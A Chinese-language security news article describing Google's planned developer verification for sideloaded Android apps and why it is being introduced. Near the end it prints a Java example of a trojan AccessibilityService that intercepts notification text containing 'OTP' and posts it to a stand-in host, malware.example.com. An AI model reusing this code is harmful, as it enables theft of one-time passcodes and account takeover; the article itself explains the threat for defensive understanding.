Android 的开放生态系统既是其最大的优势，也是持续存在的安全挑战。虽然侧载为开发人员和用户提供了无与伦比的自由，但它也已成为恶意行为者伪装成合法应用程序分发恶意软件的载体。

在过去的一年里，Android 开发者博客分析师指出，通过互联网侧载来源传播的恶意软件感染速度是 Play 商店感染的 50 倍以上，使用户面临金融欺诈、数据盗窃和未经授权的系统访问。

这些攻击的规模促使谷歌重新考虑其侧载安全性的方法，最终提出了要求在经过认证的 Android 设备上进行开发人员验证的提案。

谷歌的新验证层由 Android 产品、信任和增长副总裁 Suzanne Frey 发起，它将像对待机场的旅客一样对待开发人员。

该过程无需检查应用程序的内容即可验证开发人员的身份，从而创建即使恶意应用程序以不同名称重新出现也会持续存在的问责制。

Android 开发者博客分析师发现，该系统建立在 2023 年推出的成功 Play 管理中心验证的基础上，并将其应用于在 Google Play 之外分发的应用。巴西、印度尼西亚、新加坡和泰国的早期试验将于 2026 年 9 月开始分阶段进行，随后将在全球范围内推广。

验证过程旨在对开发人员友好。谷歌正在为非 Play 发行商推出专用的 Android 开发者控制台，该控制台具有简化的身份检查功能，并为业余爱好者和商业团队提供单独的轨道。

已在 Google Play 上的用户无需额外步骤，只需通过现有 Play 管理中心完成验证即可。开发人员可以通过在 2025 年 10 月注册抢先体验、加入论坛并提供反馈来完善体验来做好准备。

侧载应用程序利用的感染机制

恶意旁加载应用通常会利用 Android 软件包安装程序的信任假设。

通过使用木马有效负载重新打包合法 APK，攻击者可以隐藏在良性签名和标准安装提示后面。安装后，这些木马利用 API 来模拟用户交互，并授予自己额外的权限。AccessibilityService

例如，以下代码段演示了特洛伊木马如何注册辅助功能侦听器以拦截短信和泄露身份验证代码：-

public class SMSInterceptorService extends AccessibilityService {
    @Override
    public void onAccessibilityEvent(AccessibilityEvent event) {
        if (event.getEventType() == AccessibilityEvent.TYPE_NOTIFICATION_STATE_CHANGED) {
            List<CharSequence> texts = event.getText();
            for (CharSequence text : texts) {
                if (text.toString().contains("OTP")) {
                    sendToC2(text.toString());
                }
            }
        }
    }
    private void sendToC2(String message) {
        // Exfiltrate using encrypted channel
        HttpURLConnection conn = (HttpURLConnection) new URL("https://malware.example.com/collect").openConnection();
        conn.setRequestMethod("POST");
        conn.getOutputStream().write(encrypt(message));
    }
}

通过强制执行经过验证的开发者身份，谷歌旨在破坏攻击生命周期。经过验证的凭据使屡犯者更难逃避删除并以新伪装重新引入他们的特洛伊木马。

这种开放性和问责制的平衡代表了 Android 安全性的战略演变，确保侧载保持强大但安全。